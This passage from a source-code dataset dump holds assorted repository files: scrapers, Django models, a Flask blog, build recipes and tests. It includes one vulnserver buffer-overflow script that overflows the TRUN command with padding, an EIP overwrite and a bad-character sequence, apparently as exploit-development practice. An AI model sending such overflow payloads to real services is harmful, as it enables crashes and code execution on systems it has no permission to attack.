blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 2
616
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
69
| license_type
stringclasses 2
values | repo_name
stringlengths 5
118
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringlengths 4
63
| visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 2.91k
686M
โ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 213
values | src_encoding
stringclasses 30
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 2
10.3M
| extension
stringclasses 246
values | content
stringlengths 2
10.3M
| authors
listlengths 1
1
| author_id
stringlengths 0
212
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d84af18fe56189733f921cafb5d0b50df6b510f0
|
188fe0297208671994b0b86595777c299868db97
|
/src/sniptly/utils.py
|
4284f010f9fd3e66a38517071dbebcc8ad37baee
|
[
"MIT"
] |
permissive
|
jjaakko/sniptly
|
2e986a51e7a8fa0e64907bab277ea735d47b65ef
|
c8190294f75a7b3db26af40e4b3592b5c5971b91
|
refs/heads/main
| 2023-05-31T22:41:53.398006
| 2020-07-08T14:57:52
| 2021-06-25T12:53:04
| 380,056,593
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 316
|
py
|
from typing import List
def extensions_to_glob_patterns(extensions: List) -> List[str]:
"""Generate a list of glob patterns from a list of extensions.
"""
patterns: List[str] = []
for ext in extensions:
pattern = ext.replace(".", "*.")
patterns.append(pattern)
return patterns
|
[
"jaakko.kuurne@gmail.com"
] |
jaakko.kuurne@gmail.com
|
c60cdc9f404197e9f25f6886a5275714e93ab0a6
|
e5d3d68e9353af93875707551d2747617245ffc3
|
/climate/climate_data.py
|
f4be63b690f9dfa1fdda948ff96308128c166dc9
|
[] |
no_license
|
Ryan2718/Python-Projects
|
5686679ba82c0feb7c4155e7a4a2adea51bad1a3
|
2b57abfe19007baaeba86fdd6a1ecd8fc6b1cb9c
|
refs/heads/master
| 2020-06-18T00:00:14.071343
| 2019-07-10T02:00:06
| 2019-07-10T02:00:06
| 196,105,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
# -*- coding: utf-8 -*-
class ClimateData(object):
def __init__(self, monthly_avg_tmps, monthly_avg_precips, hemisphere):
self.monthly_avg_tmps = monthly_avg_tmps # Degree C
self.monthly_avg_precips = monthly_avg_precips # mm
self.hemisphere = hemisphere
|
[
"8814511+Ryan2718@users.noreply.github.com"
] |
8814511+Ryan2718@users.noreply.github.com
|
70eaf35542dd8f1c66ae7cf3d79e7fd989040d4c
|
e6360219ba06194fac1f7ea91cd003f2a3db2ff1
|
/study_3/home_price.py
|
70c87c85c7010e1d2e3b1df1b68437f655c24d18
|
[] |
no_license
|
jianhanke/spider
|
077926c83c3d14ccd233a9a2425d181511578f3b
|
63bf688b6592d1e9dd879728eab84a7c32b73b0a
|
refs/heads/master
| 2020-06-03T02:45:50.597189
| 2019-12-01T05:00:03
| 2019-12-01T05:00:03
| 191,402,230
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,442
|
py
|
import requests
from bs4 import BeautifulSoup
import pymysql
import math
all_div=[]
all_sql=[]
initial_url='https://bj.fang.lianjia.com/loupan/'
r=requests.get(initial_url)
html=r.text
soup=BeautifulSoup(html,'html.parser')
num=soup.find('span',attrs={'class':'value'}).string
page_num=math.ceil(int(2)/int(10))+1
for num in range(1,page_num):
url='https://zz.fang.lianjia.com/loupan/bba0eba300pg{}/'.format(num)
r=requests.get(url)
html=r.text
soup=BeautifulSoup(html,'html.parser')
all_div=soup.find_all('div',attrs={'class':'resblock-desc-wrapper'})
for div in all_div:
all_li=div.find_all('div',attrs={'class':'resblock-name'})
price=div.find('span',attrs={'class':'number'}).string
price=" '{}' ".format(price)
address=div.find('div',attrs={'class':'resblock-location'}).find('a').string
address="'{}' ".format(address)
for i in all_li:
one=i.find('a')
url='https://zz.fang.lianjia.com'+one.get('href')
url="'{}' ".format(url)
name=one.string
name="'{}' ".format(name)
sql="insert into zz_home_price (price,name,address,url) values ({},{},{},{})".format(price,name,address,url)
all_sql.append(sql)
print(sql)
#็ฎก็ๆฐๆฎๅบๆนๆณ๏ผ่ฟๅ db,cursor
db=pymysql.connect(host='localhost',user='root',password='zhao/980931',port=3306,db='spiders')
cursor=db.cursor()
for i in all_sql:
try:
cursor.execute(i)
db.commit()
except:
pass
|
[
"1340289@qq.com"
] |
1340289@qq.com
|
506d688e20757e0dd1604e8d6ae25f193dfeba46
|
5d2bc0efb0e457cfd55a90d9754d5ced9c009cae
|
/venv/lib/python2.7/site-packages/tests/test_143_BindParamInsertStmtNoneParam.py
|
7f4130ed2b4d3e3e6d5fd8ef375b62d1d15af6c8
|
[] |
no_license
|
michaelp1212/paxton
|
dafe08eca55557d036189d5242e47e89ec15bf2d
|
0bd1da471c3a594c0765a4bc5cd1288404791caf
|
refs/heads/master
| 2021-03-25T07:17:06.523340
| 2020-03-19T01:38:24
| 2020-03-19T01:38:24
| 247,598,121
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,576
|
py
|
#
# Licensed Materials - Property of IBM
#
# (c) Copyright IBM Corp. 2007-2008
#
from __future__ import print_function
import sys
import unittest
import ibm_db
import config
from testfunctions import IbmDbTestFunctions
class IbmDbTestCase(unittest.TestCase):
def test_143_BindParamInsertStmtNoneParam(self):
obj = IbmDbTestFunctions()
obj.assert_expect(self.run_test_143)
def run_test_143(self):
conn = ibm_db.connect(config.database, config.user, config.password)
ibm_db.autocommit(conn, ibm_db.SQL_AUTOCOMMIT_OFF)
insert1 = "INSERT INTO animals (id, breed, name, weight) VALUES (NULL, 'ghost', NULL, ?)"
select = 'SELECT id, breed, name, weight FROM animals WHERE weight IS NULL'
if conn:
stmt = ibm_db.prepare(conn, insert1)
animal = None
ibm_db.bind_param(stmt, 1, animal)
if ibm_db.execute(stmt):
stmt = ibm_db.exec_immediate(conn, select)
row = ibm_db.fetch_tuple(stmt)
while ( row ):
#row.each { |child| print child }
for i in row:
print(i)
row = ibm_db.fetch_tuple(stmt)
ibm_db.rollback(conn)
else:
print("Connection failed.")
#__END__
#__LUW_EXPECTED__
#None
#ghost
#None
#None
#__ZOS_EXPECTED__
#None
#ghost
#None
#None
#__SYSTEMI_EXPECTED__
#None
#ghost
#None
#None
#__IDS_EXPECTED__
#None
#ghost
#None
#None
|
[
"smartwebdev2017@gmail.com"
] |
smartwebdev2017@gmail.com
|
c8851fdcd0ba2ec7377d62611dc383d6a9fc7a29
|
e1184e2b369fd262477faee6ba526529d14bd972
|
/usrosint/modules/money/bymeacoffee.py
|
e8f85f0c98cdcb9f7acaa103ee14cdd3b8ec499a
|
[] |
no_license
|
krishpranav/usr-osint
|
f3cf9d745fe15344c68c6ebde65e4963a6da6a96
|
9f2aba37563d483662997e88df875d7a4b8df3a6
|
refs/heads/master
| 2023-04-10T05:44:53.193444
| 2021-05-03T06:37:01
| 2021-05-03T06:37:01
| 363,646,588
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,302
|
py
|
#!/usr/bin/env python3
# imports
import requests
import time
class BuyMeACoffee:
def __init__(self, config, permutations_list):
self.delay = config['plateform']['buymeacoffee']['rate_limit'] / 1000
self.format = config['plateform']['buymeacoffee']['format']
self.permutations_list = [perm.lower() for perm in permutations_list]
self.type = config['plateform']['buymeacoffee']['type']
def possible_usernames(self):
possible_usernames = []
for permutation in self.permutations_list:
possible_usernames.append(self.format.format(
permutation = permutation,
))
return possible_usernames
def search(self):
buymeacoffee_usernames = {
"type": self.type,
"accounts": []
}
possible_usernames_list = self.possible_usernames()
for username in possible_usernames_list:
try:
r = requests.get(username)
except requests.ConnectionError:
print("failed to connect to buymeacoffee")
if r.status_code == 200:
buymeacoffee_usernames["accounts"].append({"value": username})
time.sleep(self.delay)
return buymeacoffee_usernames
|
[
"krisna.pranav@gmail.com"
] |
krisna.pranav@gmail.com
|
b90ea379482b78b1417dc5edfa366466e4debbcc
|
7a183caebc1ec41e108d7d6457952b7848d1cec4
|
/vulnserver/4_vs_test_badchars.py
|
f57ee6c5f8715bf4ca0b23d74ec80a31dc8310b9
|
[] |
no_license
|
charchitt/Exploiting-Simple-Buffer-Overflows-on-Win32
|
b4c0289a0a107f19c927980c3dd11a0fce80b787
|
fd31f914b8dcd59926a6b2fcfe7eda1061d0f0ec
|
refs/heads/master
| 2021-09-10T21:12:52.098548
| 2018-04-02T08:03:23
| 2018-04-02T08:03:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,490
|
py
|
#!/usr/bin/python
import socket
server = '192.168.1.19'
sport = 9999
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((server, sport))
print s.recv(1024)
# root@kali:~/Desktop/exploit_development/tools# ./badchar.py
# Length of badchars = 256
badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
attack = 'A' * 2006 + 'BBBB' + badchars + 'C' * (3000-2006-4-len(badchars))
s.send(('TRUN .' + attack + '\r\n'))
print s.recv(1024)
s.send('EXIT\r\n')
print s.recv(1024)
s.close()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
a2e6edfc7aac4240eb34217f1becdb34cd8d5020
|
305703bc970856fb472543842b89f6fcde8c6dae
|
/lib/vnf_util.py
|
74013ca9d51670a6f79600fffed4280827ce7fca
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
whiteslack/vnfproxy-monitor
|
9d78d6fa88a4fddd9998f60fe720598fe38d3ab7
|
198f17ef955f36a360bda3b4fc4941e5fd4986d8
|
refs/heads/master
| 2023-02-09T14:14:27.674372
| 2018-01-15T14:51:34
| 2018-01-15T14:51:34
| 326,210,955
| 0
| 0
|
NOASSERTION
| 2021-01-02T15:25:05
| 2021-01-02T15:24:57
| null |
UTF-8
|
Python
| false
| false
| 748
|
py
|
import sys
sys.path.append('lib')
import os
from charmhelpers.core.hookenv import (
config,
log,
hook_name, action_name, action_tag)
def dump_config():
try:
cfg = config()
log(cfg)
for key in sorted(cfg):
value = cfg[key]
log("CONFIG: %s=%s" % (key, value))
except Exception as e:
log('Dumping config failed:' + str(e), level='ERROR')
def dump_environment():
log("HookName: %s" % hook_name())
log("ActionName: %s" % action_name())
log("ActionTag: %s" % action_tag())
log(os.environ)
def get_real_ip(ip_address_string):
if not ip_address_string:
return None
a = ip_address_string.split(';')[0]
b = a.split(',')[0]
return b
|
[
"jmguzman@whitestack.com"
] |
jmguzman@whitestack.com
|
c11859f6e1d0616857c9b865a1805b79f9b8c7f0
|
1e0c96a0dfe38dec1a455d3bc060db68da1e3775
|
/Labs/lab9/check.py
|
903d4465646cfc4090ecacab1907a4df9122b00a
|
[] |
no_license
|
aakib97/CSE3100-Fall2018
|
9849733b7479398746ba5b01c29ad727c0f3558c
|
ff492efbad26c9965a4ee179824d41805385d164
|
refs/heads/master
| 2020-04-20T13:37:33.803482
| 2019-02-02T20:22:18
| 2019-02-02T20:22:18
| 168,873,695
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,194
|
py
|
#!/usr/bin/python
from __future__ import print_function
from collections import deque
import sys, re
def sys_error(s):
print ("Error: " + s)
sys.exit(1)
# not used
def print_help():
print("Useage: check.py")
sys.exit(0)
ptn_id = re.compile('^(Computer|Printer)\s+(\d+)\s');
ptn_job = re.compile('job\s+(\d+)');
ptn_summary = re.compile('\s(\d+)\s+jobs');
ptn_config = re.compile('(jobs|computers|printers|size)=(\d+)');
n_lines = 0
num_jobs = num_computers = num_printers = q_size = 0
computer_total = printer_total = 0
job_count = 0
for line in sys.stdin:
n_lines += 1
# config lines
if n_lines < 5:
# check parameters
m = re.search(ptn_config, line)
if m:
key = m.group(1)
v = int(m.group(2), 0)
if key == 'jobs':
num_jobs = v
elif key == 'computers':
num_computers = v
elif key == 'printers':
num_printers = v
else:
q_size = v
assert num_computers > 0
assert num_printers > 0
assert num_jobs > 0
assert q_size > 0
computers = [0] * num_computers
printers = [0] * num_printers
q = deque([])
else:
sys_error("Not a configuration line.\n"+line)
continue
m = re.search(ptn_id, line)
if not m:
sys_error("Not a computer/printer activity.")
mj = re.search(ptn_job, line)
ms = re.search(ptn_summary, line)
pcid = int(m.group(2))
job = -1
total = -1
if m.group(1) == 'Computer':
if mj:
job = int(mj.group(1))
if job != job_count :
sys_error("Job {} has not been submitted yet.\nline {}:{}{}".
format(job_count, n_lines, line, q))
q.append(job)
computers[pcid] = 0
job_count += 1
elif ms:
computer_total += int(ms.group(1))
continue
else: # wait
if len(q) < q_size and computers[pcid] == 0:
sys_error("Computer should not wait.\nline {}:{}{}".format(n_lines, line, q))
computers[pcid] = 1
else:
if mj:
job = int(mj.group(1))
job2 = q.popleft()
if job != job2:
sys_error("Printer did not fetch the first job in the queue.\nLine {}: {}".
format(n_lines, line))
printers[pcid] = 0
elif ms:
printer_total += int(ms.group(1))
continue
else:
if len(q) > 0 and printers[pcid] == 0:
sys_error("Printer should not wait.\nline {}:{}{}".format(n_lines, line, q))
printers[pcid] = 1
if job > 0 :
print("line {}:{}{}".format(n_lines, line, q))
if len(q) > q_size :
sys_error("The queue has more than {} elements.\n".format(q_size))
#sanity check
print(len(q), num_jobs, computer_total, printer_total)
assert len(q) == 0
assert job_count == num_jobs
assert computer_total == num_jobs
assert printer_total == num_jobs
|
[
"noreply@github.com"
] |
aakib97.noreply@github.com
|
ecd4be1afced3ec620f42586d01fd75dd3af6f6e
|
aa59c25c4f26e56fcccae3d97cd3a06f3b9fdd8f
|
/observatorio/apps/proyecto/models.py
|
3aca9deefaaf0f2c86f470918bae50ca9de4976b
|
[] |
no_license
|
observatorio-app/appobservatorio
|
63c75d2fadb268d5581c1aafe0d73f53ce75845c
|
0f72dfb6bf0857d3671e080c32ce95bdc1ab7195
|
refs/heads/master
| 2020-09-12T22:29:41.975541
| 2016-10-20T23:21:08
| 2016-10-20T23:21:08
| 67,890,241
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,230
|
py
|
from __future__ import unicode_literals
# -*- encoding: utf-8 -*-
from django.contrib.auth.models import User
from django.db import models
class inicioModel(models.Model):
titulo_inicio = models.CharField(max_length = 100)
descripcion_inicio = models.CharField(max_length = 2000)
imagen = models.ImageField(upload_to = 'img/', blank = True, null = True)
def __str__(self):
return self.titulo_inicio
def __unicode__(self):
return self.titulo_inicio
class TipoSolucion(models.Model):
nombre_tipo_solucion = models.CharField(max_length = 80)
def __str__(self):
return self.nombre_tipo_solucion
def __unicode__(self):
return self.nombre_tipo_solucion
class Asesor(models.Model):
nombre_asesor = models.CharField(max_length = 80)
def __str__(self):
return self.nombre_asesor
def __unicode__(self):
return self.nombre_asesor
class Tematica(models.Model):
nombre_tematica = models.CharField(max_length = 80)
def __str__(self):
return self.nombre_tematica
def __unicode__(self):
return self.nombre_tematica
class AnoPublicacion(models.Model):
fecha_publicacion = models.CharField(max_length = 7)
def __str__(self):
return self.fecha_publicacion
def __unicode__(self):
return self.fecha_publicacion
class Programa(models.Model):
nombre_programa = models.CharField(max_length = 150)
def __str__(self):
return self.nombre_programa
def __unicode__(self):
return self.nombre_programa
class Proyecto(models.Model):
nombre_proyecto = models.CharField(max_length = 300)
descripcion_proyecto = models.CharField(max_length = 1500)
nombre_autor = models.CharField(max_length = 80)
asesor = models.ForeignKey(Asesor)
tipo_solucion = models.ForeignKey(TipoSolucion)
area_tematica = models.ForeignKey(Tematica)
fecha_publicacion = models.ForeignKey(AnoPublicacion, default = 1)
fecha_subido = models.DateField(auto_now = True)
codigo_barras = models.CharField(max_length = 100)
codigo_topografico = models.CharField(max_length = 100)
documento = models.FileField(upload_to = 'file/')
usuario = models.ForeignKey(User)
programa = models.ForeignKey(Programa, default = 1)
def __str__(self):
return self.nombre_proyecto
def __unicode__(self):
return self.nombre_proyecto
|
[
"alka65@hotmail.com"
] |
alka65@hotmail.com
|
50a447e509a6ebe7b197517babfbbed9f929b499
|
e4ef71dc9fac6c6e14e756bd08f90fd0be4c2cbc
|
/setup.py
|
30a5c8dbd40c094cb90bb9e07b2bb145d66f783a
|
[] |
no_license
|
kanemathers/gitdeployed
|
83ce202d6871e170d8e4ad387ffa49b0e2dbde67
|
559792a52a8f531e2fbe456d4bdb711b8612b8ee
|
refs/heads/master
| 2021-01-25T07:08:30.495584
| 2013-03-18T12:18:40
| 2013-03-21T23:48:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,288
|
py
|
import os
from setuptools import setup, find_packages
here = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(here, 'README.md')).read()
CHANGES = open(os.path.join(here, 'CHANGES.txt')).read()
requires = [
'pyramid',
'SQLAlchemy',
'transaction',
'pyramid_tm',
'pyramid_debugtoolbar',
'zope.sqlalchemy',
'waitress',
'gitpython',
'py-bcrypt',
]
setup(name='gitdeployed',
version='0.7',
description='gitdeployed',
long_description=README + '\n\n' + CHANGES,
classifiers=[
"Programming Language :: Python",
"Framework :: Pyramid",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Internet :: WWW/HTTP :: WSGI :: Application",
],
author='Kane Mathers',
author_email='kane@kanemathers.name',
url='https://github.com/kanemathers/gitdeployed',
keywords='web wsgi bfg pylons pyramid angularjs git service hooks',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
test_suite='gitdeployed',
install_requires=requires,
entry_points="""\
[paste.app_factory]
main = gitdeployed:main
[console_scripts]
gitdeployed = gitdeployed.scripts.gitdeployed:main
""",
)
|
[
"kane@kanemathers.name"
] |
kane@kanemathers.name
|
42edb0eb2d403f1126c37e4449983680b6cfcb5a
|
7911be298e9076bb5196ef439a9390b753f88bb7
|
/blogz/main.py
|
f3a3fedede0a9e4ba0499dc3592b54da59eea966
|
[] |
no_license
|
hadelesko/build-a-blog
|
8ace8cbe9c904103886db53ce1cb0218b17fd401
|
a001fabaefc25bf1683b0f328190f0ca5cd043b9
|
refs/heads/master
| 2020-03-11T00:12:57.330004
| 2018-04-28T19:10:06
| 2018-04-28T19:10:06
| 129,658,303
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,731
|
py
|
from flask import Flask, request, redirect, render_template, url_for
from flask_sqlalchemy import SQLAlchemy
import cgi
###
# Prototype of redirect() function is as below โ
# Flask.redirect(location, statuscode, response)
# In the above function โ
# location parameter is the URL where response should be redirected.
# statuscode sent to browserโs header, defaults to 302.
# response parameter is used to instantiate response.
###
app = Flask(__name__)
app.config['DEBUG'] = True
# Note: the connection string after :// contains the following info:
# user:password@server:portNumber/databaseName
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://blogz:password@localhost:3306/blogz'
app.config['SQLALCHEMY_ECHO'] = True
blogs=db.relationship('movie', backref=owner)
db = SQLAlchemy(app)
app.secret_key = 'danken'
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(120))
password = db.Column(db.String(300))
logged_in = db.Column(db.Boolean)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
blogs = db.relationship('Blogs', backref=owner)
def __init__(self,blog_title, blog_body, posted):
self.username= username
self.password= password
self.logged_in = False
@app.before_request
def require_login():
allowed_routes = ['login', 'signup']
if request.endpoint not in allowed_routes and 'username' not in session:
return redirect('/login')
@app.route('/login', methods=['POST', 'GET'])
def login():
if request.method == 'POST':
username = request.form['username']
password = request.form['password']
user = User.query.filter_by(username=username).first()
if user and user.password == password:
session['username'] = username
flash("Logged in")
return redirect('/')
else:
flash('User password incorrect, or user does not exist', 'error')
return render_template('login.html')
@app.route('/signup', methods=['POST', 'GET'])
def signup():
if request.method == 'POST':
email = request.form['email']
password = request.form['password']
# TODO - validate user's data
existing_user = User.query.filter_by(username=username).first()
if not existing_user:
new_user = User(username, password)
db.session.add(new_user)
db.session.commit()
session['username'] = username
return redirect('/')
else:
# TODO - user better response messaging
return "<h1>Duplicate user</h1>"
return render_template('signup.html')
@app.route('/logout')
def logout():
del session['username']
return redirect('/')
@app.route('/', methods=['POST', 'GET'])
def index():
owner = User.query.filter_by(email=session['username']).first()
if request.method == 'POST':
task_name = request.form['task']
new_task = Task(task_name, owner)
db.session.add(new_task)
db.session.commit()
tasks = Task.query.filter_by(completed=False,owner=owner).all()
completed_tasks = Task.query.filter_by(completed=True,owner=owner).all()
return render_template('todos.html',title="Get It Done!",
tasks=tasks, completed_tasks=completed_tasks)
@app.route('/delete-task', methods=['POST'])
def delete_task():
task_id = int(request.form['task-id'])
task = Task.query.get(task_id)
task.completed = True
db.session.add(task)
db.session.commit()
return redirect('/')
if __name__ == '__main__':
app.run()
@app.route('/', methods=['POST', 'GET'])
def confirm_signup():
username = request.form['username']
password= request.form['password']
verify_password= request.form['verify_password']
email= request.form['email']
errors = { "username": "", "password": "", "verify_password": "", "email" : ""}
u_error= "" #errors_massage[0] #=(list(errors.values()))[0]
p_error= "" #errors_massage[1] #=(list(errors.values()))[1]
pv_error= "" #errors_massage[2] #=(list(errors.values()))[2]
em_error= "" #errors_massage[3] #=(list(errors.values()))[3]
errors_massage=[]
if len(username)==0 or len(username) not in range(3, 21) or username.find(' ')!=-1:
#errors["username"] = "The '{0}' have not to be empty and has no space.The length has not to be out of the range 3 to 21".format("username")
u_error="The '{0}' have not to be empty and has no space.The length has not to be out of the range 3 to 21".format("username")
errors_massage.append(u_error)
#return u_error
else:
u_error=""
errors_massage.append(u_error)
#return u_error
if len(password) not in range(3, 21) or password.find(' ')!=-1:
#errors["password"] = "The '{0}'length has not to be out of the range 3 to 21".format("password")
p_error= "The '{0}'length has not to be out of the range 3 to 21".format("password")
p_error
errors_massage.append(p_error)
#return p_error
else:
p_error=""
errors_massage.append(p_error)
#return p_error
#TODO 1: Fix this later to redirect to '/welcome?username={username}'
if len(errors_massage[0])==0 and len(errors_massage[1])==0 and len(errors_massage[2])==0 and len(errors_massage[3])==0:
#if len(u_error)==0 and len(p_error)==0 and len(pv_error)==0 and len(em_error)==0:
return render_template('confirm.html', email=email, username=username)
#return redirect('/welcome?username=' + )
#case errors == at least field has errors
else:
return render_template('signup.html', u_error=errors_massage[0], p_error=errors_massage[1], pv_error=errors_massage[2], em_error=errors_massage[3], username=username, email=email)
|
[
"koomiadeh@gmail.com"
] |
koomiadeh@gmail.com
|
6fea38efd9587c0f1c4bc509aa002254a6355839
|
bd882b2eb4cd60d8bf85e3315756115a64df0456
|
/2.1 Concurrent.futures.py
|
4d7ed0b2d56cc49bfb0e4764d3fb9098cd6971d8
|
[] |
no_license
|
nicholas-dinicola/Multiprocessing-Threading
|
821081f20a8c45e1ee2f21227b24b7128136a4ad
|
52d177b1cac8197698fee149865c1baf85a6b328
|
refs/heads/main
| 2023-04-15T00:27:43.067653
| 2021-04-30T12:14:28
| 2021-04-30T12:14:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
import time
import concurrent.futures
start = time.perf_counter()
# USING CONCURRENT.FUTURES
# Create th efunction and return the values this time as a string
def do_something(seconds):
print(f"Sleeping for {seconds} second...")
time.sleep(seconds)
return f"Done sleeping!... {seconds}"
# Use concurrent futures pool
with concurrent.futures.ProcessPoolExecutor() as executor: # concurrent.futures.ThreadPoolExecutor() for Threading
f1 = executor.submit(do_something, 1)
f2 = executor.submit(do_something, 1)
print(f1.result())
print(f2.result())
finish = time.perf_counter()
print(f"Finished in {round(finish-start, 2)} seconds")
|
[
"noreply@github.com"
] |
nicholas-dinicola.noreply@github.com
|
9a10e0de99d5041d082038eac9a19066c6e33076
|
3666c88c1bb764e3d98bbfd56205c8b988a254f1
|
/INFO1_09_C.py
|
c50a821271e5e0d1a4867aaa18a96b7ab4dc9704
|
[] |
no_license
|
shi-mo/aoj
|
538b97e7d56136df0197ad015cc85c5aa9501ca5
|
b058e77a53163a0ada1425d3966b45b2619e275c
|
refs/heads/master
| 2023-04-02T18:33:43.783422
| 2023-03-20T12:20:37
| 2023-03-20T12:20:37
| 6,807,323
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 140
|
py
|
n = int(input())
q = int(input())
a = [0] * n
for _ in range(q):
k = int(input())
a[k] += 1
print('\n'.join([str(x) for x in a]))
|
[
"yoshifumi.shimono@gmail.com"
] |
yoshifumi.shimono@gmail.com
|
be797f6881585deaade34f37044408d5b9dd06c1
|
cceac4991f4835dd30584f101e02bbc6c42f9e94
|
/conanfile.py
|
9f6ed061c8f9d053b70f5cd1fc82c5cd3a45df4a
|
[
"MIT"
] |
permissive
|
CPP-MULTI-LIB-CONAN-JENKINS-EXAMPLE/ci-LibA
|
d194bb68e51b9b7931483157f8296ff086adeca9
|
f2d0095195807a26514ba9accc05b029c04fc6f7
|
refs/heads/master
| 2021-07-08T01:41:36.125617
| 2020-02-23T22:11:36
| 2020-02-23T22:11:36
| 242,383,139
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,690
|
py
|
import os
from conans import ConanFile, CMake, tools
class LibA(ConanFile):
name = "LibA"
version = "0.0.1"
default_user = "testuser"
default_channel = "stable"
description = "LibA Test library for ci testing, no dependencies"
url = "https://github.com/CPP-MULTI-LIB-CONAN-JENKINS-EXAMPLE/ci-LibA.git"
license = "MIT"
author = "Frieder Pankratz"
short_paths = True
generators = "cmake"
settings = "os", "compiler", "build_type", "arch"
compiler = "cppstd"
options = {
"shared": [True, False],
"with_tests": [True, False]
}
default_options = {
"shared": True,
"with_tests" : True
}
exports_sources = "include/*","src/*","tests/*", "CMakeLists.txt"
def requirements(self):
if self.options.with_tests:
self.requires("gtest/1.10.0")
def _configure_cmake(self):
cmake = CMake(self)
cmake.verbose = True
def add_cmake_option(option, value):
var_name = "{}".format(option).upper()
value_str = "{}".format(value)
var_value = "ON" if value_str == 'True' else "OFF" if value_str == 'False' else value_str
cmake.definitions[var_name] = var_value
for option, value in self.options.items():
add_cmake_option(option, value)
cmake.configure()
return cmake
def configure(self):
pass
def build(self):
cmake = self._configure_cmake()
cmake.build()
def package(self):
cmake = self._configure_cmake()
cmake.install()
def package_info(self):
self.cpp_info.libs = tools.collect_libs(self)
|
[
"you@example.com"
] |
you@example.com
|
a64245cbe787503c981ed5ae555557bd8c098130
|
2a3164480da911ee2f3a59cae113c79a8946ff21
|
/auto_ml/train.py
|
a521b44e27dec424589354268866a7421fff4b51
|
[] |
no_license
|
rshekhovtsov/romla
|
8e0f8002f5c972e9631406c6b2a5189749d54630
|
bdf3804eb0b4ac0b0166031c685212e11f2de1f1
|
refs/heads/master
| 2020-03-29T22:08:38.157897
| 2018-10-08T16:05:34
| 2018-10-08T16:05:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,031
|
py
|
import argparse
import os
import pandas as pd
import pickle
import time
from sklearn.linear_model import Ridge, LogisticRegression
from sklearn.preprocessing import StandardScaler
from utils import transform_datetime_features
from auto_ml import Predictor
# use this to stop the algorithm before time limit exceeds
TIME_LIMIT = int(os.environ.get('TIME_LIMIT', 5*60))
def train( args ):
start_time = time.time()
# my auto-ml hyper parameters
hyper_params_corr_limit = 0.95 # columns with correlation module greater then corr_limit, will be removed
hyper_params_max_columns = 10 ** 4 #max column allowed for dataset
hyper_params_onehot_max_uniq_values = 100 #max unique values in column to consider it as category
df = pd.read_csv(args.train_csv)
df_y = df.target
df_X = df.drop('target', axis=1)
print('Dataset read, shape {}'.format(df_X.shape))
# dict with data necessary to make predictions
model_config = {}
# features from datetime
df_X = transform_datetime_features(df_X)
# missing values
if any(df_X.isnull()):
model_config['missing'] = True
df_X.fillna(-1, inplace=True)
# categorical encoding
import operator
unique_values = {}
